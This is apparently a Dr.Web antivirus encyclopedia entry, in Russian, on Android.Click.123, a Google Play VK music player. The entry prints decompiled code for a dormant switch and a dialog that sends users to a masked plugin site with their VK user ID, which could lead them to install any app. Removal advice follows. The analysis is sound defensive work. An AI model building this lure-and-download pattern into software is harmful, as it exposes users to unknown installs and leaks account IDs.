Підтримка
Цілодобова підтримка | Правила звернення

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Поширені запитання |  Форум |  Бот самопідтримки Telegram

Ваші запити

  • Всі: -
  • Незакриті: -
  • Останій: -

Зателефонуйте

Глобальна підтримка:
+7 (495) 789-45-86

Зв'яжіться з нами Незакриті запити: 

Профіль

Профіль

Android.Click.123

Добавлен в вирусную базу Dr.Web: 2016-06-14

Описание добавлено:

SHA1: 761200fde7c633274119136071a3ae248172b6d9

Детект для программы «Музыка и Видео из ВК», которая представляет собой мультимедийный плеер, однако имеет потенциально опасный функционал. Это приложение распространяется через каталог Google Play, а его разработчиком является автор троянца Android.PWS.Vk.3.

screen Android.Click.123 #drweb screen Android.Click.123 #drweb

Android.Click.123 – полностью работоспособный плеер, однако почти при каждом действии пользователя в нем незаметно происходит вызов метода isPlugin(), который в текущей версии приложения всегда возвращает значение 1 и не выполняет никаких действий.

public static boolean isPlugin() {
return 1;
}

Однако если авторы приложения модифицируют эту функцию в новой версии ПО, Android.Click.123 активирует метод plugin(), который будет настойчиво предлагать пользователям скачать некий плагин, якобы необходимый для работы программы:

public void plugin() {
if(VK.getInstance().userId != 0) {
Builder alertDialog$Builder0 = new Builder(((Context)this));
alertDialog$Builder0.setMessage("Необходимо скачать дополнение, перейдите по ссылке для
скачивания");
alertDialog$Builder0.setPositiveButton("Перейти", new DialogInterface$OnClickListener() {
public void onClick(DialogInterface dialog, int which) {
Intent intent0 = new Intent("android.intent.action.VIEW");
intent0.setData(Uri.parse("http://plug*****.info/?id=" + VK.getInstance().userId));
MainActivity.this.startActivity(intent0);
dialog.dismiss();
}
}).setNegativeButton("Отмена", new DialogInterface$OnClickListener() {
public void onClick(DialogInterface dialog, int which) {
MainActivity.this.showAds();
}
}).show();
}
}

В настоящее время этот «плагин» не несет в себе какого-либо вредоносного функционала и лишь показывает сообщение «Плагин включен»:

super.onCreate(savedInstanceState);
this.setContentView(2130968601);
Toast.makeText(((Context)this), "Плагин включен", 1).show();

Однако при необходимости злоумышленники могут заменить эту программу на любую другую, в результате чего потенциальная жертва рискует установить на мобильное устройство совершенно неизвестное приложение (в том числе какого-либо троянца), ошибочно полагая, что это компонент плеера.

Рекомендации по лечению


Android

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке